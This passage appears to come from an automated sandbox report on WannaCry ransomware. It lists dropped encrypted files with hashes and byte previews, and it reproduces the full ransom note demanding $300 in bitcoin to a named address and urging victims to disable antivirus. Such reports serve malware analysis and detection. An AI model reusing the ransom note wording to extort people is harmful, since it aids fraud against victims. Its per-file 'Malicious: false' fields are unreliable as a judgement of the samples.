wW.=.......KhF..M.t.x...D..;.AY.}..R.q@..dBH...(.m.&.$...Pxh...s.o.`G..X.>.....P8..E...[1:...'pY..@-&.G.4..X.......t.e7....6.Y..m:0.W..(.y\.:.z4........e............V....V.......q.WP...}%..8.....n.eB.....!p&g....'.....#.....v....,.m/..[.....fh.=.b.`v..'f.$.&N..0..y.^.......m.+.....yp.V...\|?#...37.\A.r.\Q"..9.x..G....?n.S..}.OO.1+.y...4..2..8.cQDL..d..#IAcVO..Z..y.......,f%......7...)>..\..h..9q^.+.........M`.i..cSB..{S,..y..t.c.z....MV....~g....=4;.,O.v........;.b*...{N.s..I..WY...>8\.t&{...f.....<O..6..H..7.r+u....G.z.Y2.8...Y+.F.....-,m.ot=M"..\|\K.....\|...\|BN.r...Z....W.\|......>\.......S....u.c<.....i.X.".n.\|.....;..`....<.1K.^....\|m..

C:\Users\user\Documents\EWZCVGNOWT\QCOILOQIKC.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.839516366716224
Encrypted:	false
SSDEEP:	24:bkxKI7rzN4axky0SuOfL3ziUp8r+tlGyZza0Ir9NcHMfMYQYp5AVHK7mdcpCv6cN:bkrrzN46k7hOf7OUp8Y3aF9NyMfrxqVJ
MD5:	C12A21926408D9BA7F342D38E98C1899
SHA1:	2963D16C0D69FCBB47EEF7950E307D14983A7825
SHA-256:	A5E04F48A98F7F32D6BD85B1ACDCCD5D4C55599478B751A8E00C98643C23AB93
SHA-512:	452B33526E9A1DD71DB37C56C62E4B8B6AEA3CF14D15E2B02736B6D4B26D3861347A485244C472DC34C8D1528BE74D7C0D1FFE07495EFCEFDD368BDE217149DF
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......e\b...#.>[..if.O.B..Z_..BnZ...I.S+{oX....0R.EY.mc.E.Q_...?...0..t.G.S.....Z./\|..d.C...t#......Q.T...w.l..%).l.......{Bu.\F.veKi...B.q.+s&.....{p...8...l.#..r.).......:.P....q...p..B.L......GLRRv.?.......G'......b.U..NE.Xm.N`.-..H.Q..(.....y.............jOX...G...1.S.\.)....]9. wW.=.......KhF..M.t.x...D..;.AY.}..R.q@..dBH...(.m.&.$...Pxh...s.o.`G..X.>.....P8..E...[1:...'pY..@-&.G.4..X.......t.e7....6.Y..m:0.W..(.y\.:.z4........e............V....V.......q.WP...}%..8.....n.eB.....!p&g....'.....#.....v....,.m/..[.....fh.=.b.`v..'f.$.&N..0..y.^.......m.+.....yp.V...\|?#...37.\A.r.\Q"..9.x..G....?n.S..}.OO.1+.y...4..2..8.cQDL..d..#IAcVO..Z..y.......,f%......7...)>..\..h..9q^.+.........M`.i..cSB..{S,..y..t.c.z....MV....~g....=4;.,O.v........;.b*...{N.s..I..WY...>8\.t&{...f.....<O..6..H..7.r+u....G.z.Y2.8...Y+.F.....-,m.ot=M"..\|\K.....\|...\|BN.r...Z....W.\|......>\.......S....u.c<.....i.X.".n.\|.....;..`....<.1K.^....\|m..

C:\Users\user\Documents\EWZCVGNOWT\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.782468176501425
Encrypted:	false
SSDEEP:	24:VjiIJJuhwSfutJZ7kJ8ckQ8oxC3abSg/TfuJtp5:gMuhwzHm3kQ8oxeaW2uJh
MD5:	D21BCCFB2B725704351148F486204B86
SHA1:	321F877BA21F9837A457A1474D58B0C6581F9F89
SHA-256:	39BC860D6EA05E248EB463FC87719AD58ECDBA575C539909E6A47D5B8E685C05
SHA-512:	8D5471DE1A20A30F372BDD64E9F6ED74A4DB7898DBC832178ABF86BD006F451E803E1EF2147A8321D65FA97D0232BC96DDAE368F1E8A29CD41C9648BDAD98D91
Malicious:	false
Reputation:	unknown
Preview:	l.sd....i..N.e.`.Ud...d{.rxj...^.R..@. .b.i.n...2:../ZRI..........Xv..4Oc...@SQ.(..y.Y<...h....N..)8Q...-.+r.CB.r..k..\|.......#..YT..'.L..i.6..Y......NW../..z.K...O.4..+..-.Yso..X.....ZV.....7...F]....<...3 &..C....y..d&&fq.]./.oY....#6,niL..5..@...c...p..I.<j.......Q.(m.;..........x....aM<2.Wc...d...s:.h%.K%.......;...I. .S..<R..w..+#2mg$.........1.....g\|.F+...J_..t.....u......^>C`....]_.........`......o4........#.........{....Lw........=.u/.v..X...Rd.\|.....G.v.:./i..s..=....w.Q......V7&.}(..]UE...@.y....Y.n?.."....m.`....C.R...S.....L6......i.jr....q7..%....,...S....!...Tu.......{....$i....nk..i....?D..Xf......9..<....[..=..IY./9p..&.ck....u........z.'dvO...Q...x..$US-%...9..G..I%..U....}1,Y.+.0m.pYM....S..s..k.=].R{..o=zfy..vw...&.".....U..UR.t......'x.....}....].l.3S.K...x..R.hx....s.l..q...h"+......."..A.2@:Fw.,.`. 6..>...^jBx.f..d......O...-.Y.._...N....hJ........E...9......8.......Z=r..3\!.2CL.~.T.)....&F'...a..../....`1...;8Y.

C:\Users\user\Documents\EWZCVGNOWT\TQDFJHPUIU.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.820889855877763
Encrypted:	false
SSDEEP:	24:bkarwlnOquELMbxx8y6p3wvrkZ0IqBBYSESYoKty2UzngVuu5NsI5pSio9H:bkarwlOqFLUfc3SkZmjYoiCzn5ap8
MD5:	6645E4221DAB557E35369E3BD5627557
SHA1:	1C57047EE38B76AD079C1E1490ACF60E02610C1C
SHA-256:	71F397E6F65F6776E16600CE88434612728DDD135AB89FECA3159B040146A4F6
SHA-512:	F4FC1DEF99916077A82FEEADCFDB354ED7CEAAEBCEC740F3F6BC37549721780DF3DB57C057C8F8175AB75E5967A20DBB6595750A40DB5BF41F3B84026C0122CA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....\+RW#+.V<h.`..Rp...9..`..fQ@.H...;._...........iRodc>.......1"I.7G.....G.Ir.C..O.....a.4..z.@..lb-..%..,:.u[.....OI....s..._nCD..._.r%...<..4C.Oz..V..jB.\.,s/.v.....(.n.O...n...[..{%DB......P..#.)..{..p...&v.....oN....._...w.7...}.......&J?..D.................#.g..r.{.P....%=.....M.G..7.&..E..A...R..Y.E...RO._8g\|)\..x.Gg..M.?;......iWy..a.$...7<.O.)jVj.h....p;...=A6p...#T4.AA`>..{!..,.c.2..%;T.....H...Q.7..>..by.95......&..m.Oe.$..~.,......Q&t.a.%.J....g.4.K/..+l.. .....y...dyB.(S;..1..('.).@........%.M..ap.!:.Z........_t.C+w+../....Z6x...W......'.:q.F...[.9..>.0.%_h.m..A.....B1........C...lH....... O...l...,.:4...C.......Q...t(.}C....0Qy..Y.1j.t..w..s.....P.........[A.......`D..-#.z..R2.{..=....^Hs..<F_.F..=............}...n.`Z..A...G..w.._s....7.s.........y.BX.....uS.y.....^O...b..4N.Zk.......T}".d1..O..Zkx..o..s....$...h.:...t6c.9.4Uxl.e.hl.E..5..CF...Bm..x..W..a.."y6Z.;@....p.R.b.b......wy{j=...t.8..8t..

C:\Users\user\Documents\EWZCVGNOWT\TQDFJHPUIU.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.820889855877763
Encrypted:	false
SSDEEP:	24:bkarwlnOquELMbxx8y6p3wvrkZ0IqBBYSESYoKty2UzngVuu5NsI5pSio9H:bkarwlOqFLUfc3SkZmjYoiCzn5ap8
MD5:	6645E4221DAB557E35369E3BD5627557
SHA1:	1C57047EE38B76AD079C1E1490ACF60E02610C1C
SHA-256:	71F397E6F65F6776E16600CE88434612728DDD135AB89FECA3159B040146A4F6
SHA-512:	F4FC1DEF99916077A82FEEADCFDB354ED7CEAAEBCEC740F3F6BC37549721780DF3DB57C057C8F8175AB75E5967A20DBB6595750A40DB5BF41F3B84026C0122CA
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....\+RW#+.V<h.`..Rp...9..`..fQ@.H...;._...........iRodc>.......1"I.7G.....G.Ir.C..O.....a.4..z.@..lb-..%..,:.u[.....OI....s..._nCD..._.r%...<..4C.Oz..V..jB.\.,s/.v.....(.n.O...n...[..{%DB......P..#.)..{..p...&v.....oN....._...w.7...}.......&J?..D.................#.g..r.{.P....%=.....M.G..7.&..E..A...R..Y.E...RO._8g\|)\..x.Gg..M.?;......iWy..a.$...7<.O.)jVj.h....p;...=A6p...#T4.AA`>..{!..,.c.2..%;T.....H...Q.7..>..by.95......&..m.Oe.$..~.,......Q&t.a.%.J....g.4.K/..+l.. .....y...dyB.(S;..1..('.).@........%.M..ap.!:.Z........_t.C+w+../....Z6x...W......'.:q.F...[.9..>.0.%_h.m..A.....B1........C...lH....... O...l...,.:4...C.......Q...t(.}C....0Qy..Y.1j.t..w..s.....P.........[A.......`D..-#.z..R2.{..=....^Hs..<F_.F..=............}...n.`Z..A...G..w.._s....7.s.........y.BX.....uS.y.....^O...b..4N.Zk.......T}".d1..O..Zkx..o..s....$...h.:...t6c.9.4Uxl.e.hl.E..5..CF...Bm..x..W..a.."y6Z.;@....p.R.b.b......wy{j=...t.8..8t..

C:\Users\user\Documents\GIGIYTFFYT.docx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.80727764253739
Encrypted:	false
SSDEEP:	24:IZPyj9nkg3cfAYduTI8Ry/5MYT1etXVtbrcVDAFSZB3ZOT:0yjerhduTzKHZAV1rctZBpOT
MD5:	07AD3E1A62363EBFC78BDE99D5FDEADC
SHA1:	5024FF6F057304DF02CDFF6F5CABE88173306D09
SHA-256:	3A8747E929BC7AA358C6D93EDEBD47AF6FF046C46CFBA8081B719E55D0F21DC2
SHA-512:	D75E8D45F7D053A2E6FFF0F30062CB5DC23C4B672E153E48D49F5BCFF1F9BE85BA5493198AF2ACF5A61A32390BE085D26A2B98E9EF20E2C6E3219D812D750BE9
Malicious:	false
Reputation:	unknown
Preview:	.QXy..&..N....S.\|....z#..i+.x...w...!@5..@R.....y...............e5....J.u.!.L.p....k.H.....!./!..D5.D.F..2;<...o.!.U...JY.l............bm_..#...kG.~...FB..O..U.v..3..`a1l...b..p9)..P.g.t\Lj...0..ZJ.\|.],......j.7.>....c....l .6G....y.m.%.pGe.!..la`...3.Z2.f.x...m..g....=?8.QO../...........F.......O..O.B..k{....S.....X..\..m..C.C.D....V.....x.\.].-.R. .:id.p3.._.J.6.....T.[D......e..?a[7.4C`32.1.].&<..u..k..o....$v........i..mP......U.1...5...D.)gL.........(......;.......AD......)^_.>...6.d....D..p@M.4...=.....3B..6.)Xv..D.b.u....._M...... .r.....f.;..0.N8P...az. af...........xB....i&C....R..P...AH.Y.'.w....S..y...(&L.dI.....K .....X...h%._.K.J.....i...O.z..i..-=.....zO.N^.....oRV\|-..J.V.....i..=.]K1r.....8,...L.T...$..D..j.KlhP."z.r@(^jN.]..No......L..9..EW.Y....1.,'.UR....M.Q.$=...5.....#G.}KW..h4.q.l..~.....iW...%..gO.G.....b..!......K....3..V.k?..o>.....h.h....;S......5.*..V\>...[s.0..B..nI..pX..P..\%...D...\......h}M..&X.

C:\Users\user\Documents\GIGIYTFFYT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.830811537050203
Encrypted:	false
SSDEEP:	24:bkwSQK+E7maL/ejq7adaNKHH9KPbzvNxYJBf8gxliqzSeMQvb8Xt32YXVEabBrgZ:bkkpqralxliqzw+qtm0VEabJm
MD5:	4B70BB1C7F6687926A0177C511F7232A
SHA1:	E6CE5ED5437B769B4105B5CEFF7F3703E34847F9
SHA-256:	81EBD7C66CD5B58BBB053F06C24F8A6D9B6F984CC03271B7D93DF5972A725253
SHA-512:	ED94439196490BE8C8612B06B8A25B7A4F2971645C7D0A7CD0361C1040DBD50B396C3F0E6A8FE44539E797715818BB3948502DF82D020E4BCC874D4DA183EFDD
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....j0..v........g\|..%...M..FWr....dK..._..y>......M...'.....X.b.Au.D.f.x..].6.K$..0.XD..h%.Y...J,.f^.G...q2..n.`.A...}N..3......K.~N1...t..;/....=......9.g....5.m<...c..Q..u......N....AY...`..\..=..hk..g..Br..c....1..q..f......9./...C............bg..L.2.Ib.i..kx.b.N...........`(....=\|..e!>...K.%..hhE.o7.w\|....WE.5...O`._..>\|.GN.%vM.....^..1.....3BR.E.#..~wh.m..o.P.d.......sMI.".H..(l.....!.M...f~..>D$.....<..I.l:...;..'EO9N..O.Uf..5..X'.p"&..n...V.............B.~....@......?..0..E%w.._V.....<C2....`.r.....U.....r V....#c.......=.....5..50..g...h...L6..f..u8....0u..n.....C.....%t..._.......I.\|\|.F\.....;.<..7...T..Z1..v........K...S+..FsF.O.n g..t.?.J..Z.0.wU..G..."..Ly..A.;...@...6..M...F..(...)....h..Ikd..@lfV....&*..@.......cN^).)\|5......../........P....Q...M.37\8...h6[.)t...U.E..t..n1.J.\|/d.)\...$:.f.l..+&..1..P.&..l...0...(.@..%[.#.Ci.....@@.[....QH.8..7.....HA..[.!....f..x.....F..%!'.#.....1z...M^....:

C:\Users\user\Documents\GIGIYTFFYT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.830811537050203
Encrypted:	false
SSDEEP:	24:bkwSQK+E7maL/ejq7adaNKHH9KPbzvNxYJBf8gxliqzSeMQvb8Xt32YXVEabBrgZ:bkkpqralxliqzw+qtm0VEabJm
MD5:	4B70BB1C7F6687926A0177C511F7232A
SHA1:	E6CE5ED5437B769B4105B5CEFF7F3703E34847F9
SHA-256:	81EBD7C66CD5B58BBB053F06C24F8A6D9B6F984CC03271B7D93DF5972A725253
SHA-512:	ED94439196490BE8C8612B06B8A25B7A4F2971645C7D0A7CD0361C1040DBD50B396C3F0E6A8FE44539E797715818BB3948502DF82D020E4BCC874D4DA183EFDD
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....j0..v........g\|..%...M..FWr....dK..._..y>......M...'.....X.b.Au.D.f.x..].6.K$..0.XD..h%.Y...J,.f^.G...q2..n.`.A...}N..3......K.~N1...t..;/....=......9.g....5.m<...c..Q..u......N....AY...`..\..=..hk..g..Br..c....1..q..f......9./...C............bg..L.2.Ib.i..kx.b.N...........`(....=\|..e!>...K.%..hhE.o7.w\|....WE.5...O`._..>\|.GN.%vM.....^..1.....3BR.E.#..~wh.m..o.P.d.......sMI.".H..(l.....!.M...f~..>D$.....<..I.l:...;..'EO9N..O.Uf..5..X'.p"&..n...V.............B.~....@......?..0..E%w.._V.....<C2....`.r.....U.....r V....#c.......=.....5..50..g...h...L6..f..u8....0u..n.....C.....%t..._.......I.\|\|.F\.....;.<..7...T..Z1..v........K...S+..FsF.O.n g..t.?.J..Z.0.wU..G..."..Ly..A.;...@...6..M...F..(...)....h..Ikd..@lfV....&*..@.......cN^).)\|5......../........P....Q...M.37\8...h6[.)t...U.E..t..n1.J.\|/d.)\...$:.f.l..+&..1..P.&..l...0...(.@..%[.#.Ci.....@@.[....QH.8..7.....HA..[.!....f..x.....F..%!'.#.....1z...M^....:

C:\Users\user\Documents\GIGIYTFFYT.xlsx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.7947967935744575
Encrypted:	false
SSDEEP:	24:t6JLSkfVMg5mY4tRup/aWICRWqlXqzGspjqx51gWS1dOn:t6xtV/mzm/dlXqqsS51gxO
MD5:	D8A39A954B0E7CF98F325DB34F36A457
SHA1:	699DBA8D8CB68AF44BA8D20519CBDB2709EE40BC
SHA-256:	6F7F545C510247011E4C60917243918BBF8B95306C31E30F88C5B29EFC7D58E4
SHA-512:	55EDC0BA8FC4E0ED4B8FCF882D1C9F4B862CA2143DD8A36A0BF41A688DBD59671E864F169BDF12123F7EED15B2D549D5CB9030AB66FE2AD032EB9B898C5808D8
Malicious:	false
Reputation:	unknown
Preview:	v,..\..$k..#.....V..QD..M..e...S...e.0..;...qv; ....q.+_...P#....qC....b..A.b.^&......x.@@.\.\|Vb..e-T?B...$.....H=Y....\...^...e.."8.~.R8.~..\:Yl.x#53..~k.J.Ov.;..B....\|Y..).[.i...>..U.2..."..L....Tj.p..(~ .(.[...z0..9..Q.......F.c.D(..{p.tM'T...)l.......9;..U.....C.LG!_..m..&.R.t...i.L......q......QkN......w)~..3.s..)/]Xp..j@c................+.a>..`0..4....I...S.br...P....)...".>/..w<..X...T.2.k...L$.J.X.Z......'..,...U..Q........G...Zg......FVj..5.Wof.-.@3...X..p~.t.$......b...p..h8!"d..&.....v.:..RD5.....V...T..T......W..QK...[=...b.%...9d.t..c.z..%@.4rv.l..g..9...).'V.......\...i.s.....T..$.8.c.o..6J._..:...m8...HCdzi+A0.0.x..K.r..O......~.....ku3..s]L...R...P>.@.sqZL.v8\|.NT.`..&.,-,...r_.?.N]...b.......LU..gf.....02Q..&_-.....i....,.#p....]..0....,..{.W....As..<.....b..>..x..]..v&[.Z..N..:.r.pL.;..4.f..O.y- ..R...=)&....}.}....r..D...@{...........z7....?.......~9-..".y9.+....w]...r4?4.J..eexx.^.X..+.Sg.\"^...e.A..A..."7...

C:\Users\user\Documents\GIGIYTFFYT.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.820908913572244
Encrypted:	false
SSDEEP:	24:bk4MbdKQZdHlY/kfPfkS7sYjv2jAGALZ6ws6ymvX3FjavuXHxgUboFcauY9JIzcR:bkH1Z/Ys5AC2UZZ46ZvX9avkR90FTEcR
MD5:	3E9A6FDB7F997146224604E7FBA5ABCB
SHA1:	C7280ACD737E16A2128BD26553721D8EE0BAAD15
SHA-256:	C5243877C6BE991D92069A479171B04800EBA17D9ED8EB8E48FC6436BBD04FF4
SHA-512:	8ABF993341B29BCAB3F96DC2067733B489FB4142142F50095FCF7200F090AC8177CBF57028FEC107C8FCCADBF6E48E34C2EF9E2608648BD767296B7C3D545E36
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....Y..r.........S.M.._W.d.j.>1J\|.....J$..z.$.+..X..WO..q...T<..v..&j..@.A..S?...P..9Y...q...D.gN-W..7...;.Ov.."`...=xR....;..f.....;...0..Wv.$O..%.G..d0.%R.3..nc....[.Cq.W..OQ..[.Z..(W.i.}.c...&..../.'..#3m6...0ap.B.D.x.$.....^..........1 .u.............9.?.......[..h...;...C.\|."..L.%..%)....SEp....Ap...}..@0...]?..7.;..M..:.`s...=.{r........X.A.]r..i,D...6...m-..DccS@..O}J..0.~.E\|P..._....y.1.8<.W....H_6..fh..e.~;.(Rq...BL..{bZo....._..&[b..X.....C0.h...p..p...,\|.[.mf..X...._r.%....w...].@0i..[x...t..O_.^:(6.~.../..b.Q..A.`..T<....7....Y..xn..Y..#,H .n...m...e9..R3.=...:....y.'{..w.-t1....J:...0...%..r,O...A.,.L6.....;E.q.4.[cMq0:.z.3.3......I..Z?rm.&Q...q..[.T.<d.>\.@-R.-..9.0r;i.MH....C..1.........Q0.m.e!T...r..1...w.f...=....b......ir;.L..."-].}.4cnd.bq..9G$i..< ......lrQ..R.....g.._.p..rK..'.b5...Ec...5.S..R Xt.v..%T.....[,..^5..Q.GK...BEn.KO....3..q7.].Ur...P.=wr<".vL\D...5..S'.,h..s....N.O..'T.]@D..v.X.@k.

C:\Users\user\Documents\GIGIYTFFYT.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.820908913572244
Encrypted:	false
SSDEEP:	24:bk4MbdKQZdHlY/kfPfkS7sYjv2jAGALZ6ws6ymvX3FjavuXHxgUboFcauY9JIzcR:bkH1Z/Ys5AC2UZZ46ZvX9avkR90FTEcR
MD5:	3E9A6FDB7F997146224604E7FBA5ABCB
SHA1:	C7280ACD737E16A2128BD26553721D8EE0BAAD15
SHA-256:	C5243877C6BE991D92069A479171B04800EBA17D9ED8EB8E48FC6436BBD04FF4
SHA-512:	8ABF993341B29BCAB3F96DC2067733B489FB4142142F50095FCF7200F090AC8177CBF57028FEC107C8FCCADBF6E48E34C2EF9E2608648BD767296B7C3D545E36
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....Y..r.........S.M.._W.d.j.>1J\|.....J$..z.$.+..X..WO..q...T<..v..&j..@.A..S?...P..9Y...q...D.gN-W..7...;.Ov.."`...=xR....;..f.....;...0..Wv.$O..%.G..d0.%R.3..nc....[.Cq.W..OQ..[.Z..(W.i.}.c...&..../.'..#3m6...0ap.B.D.x.$.....^..........1 .u.............9.?.......[..h...;...C.\|."..L.%..%)....SEp....Ap...}..@0...]?..7.;..M..:.`s...=.{r........X.A.]r..i,D...6...m-..DccS@..O}J..0.~.E\|P..._....y.1.8<.W....H_6..fh..e.~;.(Rq...BL..{bZo....._..&[b..X.....C0.h...p..p...,\|.[.mf..X...._r.%....w...].@0i..[x...t..O_.^:(6.~.../..b.Q..A.`..T<....7....Y..xn..Y..#,H .n...m...e9..R3.=...:....y.'{..w.-t1....J:...0...%..r,O...A.,.L6.....;E.q.4.[cMq0:.z.3.3......I..Z?rm.&Q...q..[.T.<d.>\.@-R.-..9.0r;i.MH....C..1.........Q0.m.e!T...r..1...w.f...=....b......ir;.L..."-].}.4cnd.bq..9G$i..< ......lrQ..R.....g.._.p..rK..'.b5...Ec...5.S..R Xt.v..%T.....[,..^5..Q.GK...BEn.KO....3..q7.].Ur...P.=wr<".vL\D...5..S'.,h..s....N.O..'T.]@D..v.X.@k.

C:\Users\user\Documents\GIGIYTFFYT\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\Documents\GIGIYTFFYT\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\Documents\GIGIYTFFYT\CZQKSDDMWR.png

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.7908864080441225
Encrypted:	false
SSDEEP:	24:Ujq7h9+P0ZiHKPO6veG3P5uePWfCKHmSgHh9ej+uxDGN:U2b+PWO62knPCNmSgHhRuxDGN
MD5:	0D78C655048F0656F6C1B4FCF62C174F
SHA1:	134D69492CCD1754F79B06815500E4DACA7CA63E
SHA-256:	2082C2E5A64F9582EF6028D6D12598F3C02A34EF164443F14D48B229466B3CDF
SHA-512:	66DDB811F8B97AFB22AC0E08694E2B03EC95B91F2920FD4523080E6E570878A2F1C03E2C736169B93F29674BB521AA3AE0EA9FDFBFDE44032206D03EBEE27B49
Malicious:	false
Reputation:	unknown
Preview:	q(.?R.A\|6."..0..OC..^.......Z.%.......... .....jX....`f.+.<!....>6.........%.Z.j.S.0.#.)c...u...E~C!v...,...!.lDSHhZ.o..xp....S..[..]l..........n.d......T....!.d.6m..?.....e..V.....%...j.A.b..y..k.H.=.....%.`...~..g uL.....T.8..d..j.$-..B..V..E..=..1.>.z.c.^.....v...B.3..M...#..;..n........_.~...)...Cw.PH.r."..e.C...!$p..8.....2u\|...g..?S...l..6Q..o6.4AV~.X..{.M.`.p= ..]..;....\...ky&...<.B..c.\..:....<.....@.#.].Q...l..I.....j...5...~..~..!...\.!!..;....~5..o.b..$.h..Ih.........[<[.;p.....W~.jX....%..{.7.l...k..........qs..3.;.n..6.~....`Z\v.!.-......\|#a{.....^.[<`?.j[..~2......4...RHNF.dG...iB......FBR.P....c....0%....'...k...J[.;C......^.=..b^.;....,.%....p.......(,../.'/.#".....y....EfR(.G..U%oB..W...-..')..&.....Gd.Y.b.....I..C....+..f....#.5..'.~.F.(...M. .;W..\|.T....x...s^..2....C@.h.vWm.....]k&.2.L.L.........lx.J....<......../....`1&.x\|....L...v.....(.C.....J.4.[..8.......[#V.yB{6......15\|K..w.1....tJ.-. .f...!..E....jI..

C:\Users\user\Documents\GIGIYTFFYT\CZQKSDDMWR.png.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.834199025236621
Encrypted:	false
SSDEEP:	24:bkUVdtVY541GH31TXQT1zSeg4PL7AvEh0UUV+Dt2EOqDra7GZx:bkUVvVPGXdebg4PL70UM+sJIqG3
MD5:	E98B27631C9736E7DB50AEBC5EC4B6C0
SHA1:	976C71C9A912B5B8F4DACA6A1EEB9E1CE2D1532A
SHA-256:	F99818A6A40B10F62B33D06712D952E7B45AA87C843E41E7EF41FA088E03AB21
SHA-512:	C3E7AE6A62A21B8BF5EA58F3B7E2C0F44F44BA302169AD467967E548513CA47A8C21ECA09CC491EDCFA3897BA532579A5F4E00EC5BD0A76FF07B98B9494E3CE2
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....of.PQ..$..T._..4v....,3....h........].X..I..b.].iR.tLLa....S..UoWIh.A."..U`...,mC.aDj...d..R0B!..Ys.w.6...v..v[g.U..e....RQ~G...Y...wn......\|Fv+...d/....$G.L.........]..;7\..9.V..i...'.\..u.\..0.]p.b.Jm'.r$.`.-g..T^J...GK>n.........j.DD.]qF...d............q.K..l..2,_..<D...f......P..V..g...p... ...d.,.C....U.........XZ./Q.".....~.k.j..$'..o.+lI..h#.]i..nx8.f.MW.I.Y.."..x;...5)g....2......?...wh..;.j.i....&.`.^qWB...}.j..5\.Q...\.6.f...G.6..D...).!.30.0I..f%A.M..R....f....&. k.....b.Af@.-l4qg._...Z."!,v.@<..i.1....S.jh..E.u;...0...Dm.4v.Q...h`.da....1s..I..9tq."=.x....Ka.>~...^.p..m<>.....6.E"..aC(...5...~...^..J..vG...Z.[.;k.RL..-..I.N'.9s>......+.../.a.q.'.....=/...-......\|....9.P..F;.....WH..j...Y..~..D.N.Q.7.o.w..@#(.[N.\|.*.....S^.x...).;B.....^..s.qAp)....g4..\.L...6..y..=G.[.;..tA.F[.x/L..8..Vn4bL....0...s.#..s.....cp...e.2E.r..).qq._o.Jm._.........4.B+.k-.W.%..y$.~o\|G.%..`.6.k.c.....}..N...Y...y..7.V..c...n[.G....To.....z...hm...G

C:\Users\user\Documents\GIGIYTFFYT\CZQKSDDMWR.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.834199025236621
Encrypted:	false
